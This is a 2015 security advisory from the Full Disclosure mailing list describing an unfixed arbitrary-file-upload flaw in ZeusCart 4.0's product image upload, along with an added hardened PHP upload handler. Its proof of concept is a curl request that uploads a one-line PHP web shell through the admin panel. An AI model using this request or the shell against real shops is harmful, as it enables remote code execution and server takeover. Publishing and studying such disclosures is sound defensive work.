Full Disclosure mailing list archives

ZeusCart 4.0: Code Execution - not fixed


From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Mon, 14 Sep 2015 18:21:05 +0200

ZeusCart 4.0: Code Execution
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:       ZeusCart 4.0
Fixed in:               not fixed
Fixed Version Link:     n/a
Vendor Contact:         support () zeuscart com
Vulnerability Type:     Code Execution
Remote Exploitable:     Yes
Reported to vendor:     08/13/2015
Disclosed to public:    09/14/2015
Release mode:           Full Disclosure
CVE:                    n/a
Credits:                Tim Coen of Curesec GmbH

2. Vulnerability Description

The image upload for a new product does not restrict the type of file
that is accepted, so a PHP file can be uploaded in place of an image. The
file is stored under the web root with its original extension, which
leads to code execution once an attacker has gained access to the backend
via SQL Injection, CSRF, or XSS.

Please note that an admin account with the right to add products is needed.

3. Proof of Concept

curl -i -s -k  -X 'POST' \
    -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \
    -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
    --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d
\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php
\x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a7\x0d\x0a----------1849257448--\x0d\x0a' \
    'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'

The image will be located here:
http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php

4. Solution

This issue was not fixed by the vendor.
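Since no vendor fix exists, the following is an added example of how the product-image upload handler can be hardened so that a request like the one in section 3 is rejected. It is written for this page and is not ZeusCart code. The form field name ufile[] is taken from the advisory and the directory images/products/ from the PoC output path; the function name storeProductImage, the size limit, and the allowlist are assumptions for illustration.

```php
<?php
// Added example, not ZeusCart code: a hardened product-image upload.
// Assumed names: storeProductImage(), UPLOAD_DIR, MAX_BYTES, ALLOWED.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/images/products'; // directory from the PoC output path
const MAX_BYTES  = 2 * 1024 * 1024;              // assumed limit

// Allowed extensions mapped to the MIME type finfo must report for the bytes.
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate one $_FILES entry and return the stored file name, or throw.
 * Every decision is based on server-side evidence; the client-supplied
 * filename and Content-Type header are never trusted on their own.
 */
function storeProductImage(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with error ' . $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a file uploaded via HTTP POST');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 1. Extension allowlist on the last suffix of the original name.
    //    "test.php" stops here; "x.php.jpg" passes and is caught by 2 and 3.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException("extension '$ext' is not allowed");
    }

    // 2. Content sniffing: the bytes must be the image type the extension claims.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }
    // getimagesize() parses the image header and fails on non-image data.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // 3. Never reuse the client filename: random name plus the validated extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, not executable
    return $name;
}

// Usage in the product-insert handler. PHP exposes ufile[0], ufile[1], ...
// as $_FILES['ufile']['name'][0], $_FILES['ufile']['tmp_name'][0], and so on.
if (!empty($_FILES['ufile']['name'][0])) {
    $first = [
        'name'     => $_FILES['ufile']['name'][0],
        'type'     => $_FILES['ufile']['type'][0],
        'tmp_name' => $_FILES['ufile']['tmp_name'][0],
        'error'    => $_FILES['ufile']['error'][0],
        'size'     => $_FILES['ufile']['size'][0],
    ];
    try {
        $stored = storeProductImage($first);
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Rejected upload: ' . htmlspecialchars($e->getMessage()));
    }
}
```

The three checks are deliberately independent: the extension allowlist alone would still accept a PHP payload named with a double extension, so the file content is verified with finfo and getimagesize(), and the stored name is generated server-side so that neither the original name nor the timestamp-prefixed form seen in the PoC (YYYY-MM-DDHHMMSStest.php) reaches the disk. Pair this with a web-server rule that refuses to execute scripts from images/products/ (for Apache with mod_php, `php_admin_flag engine off` in a Directory block; for nginx, a location that denies .php under that path), so that a future bypass of the upload check still cannot be turned into code execution.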

5. Report Timeline

08/13/2015      Informed Vendor about Issue (no reply)
09/07/2015      Reminded Vendor of release date (no reply)
09/14/2015      Disclosed to public

6. Blog Reference
http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/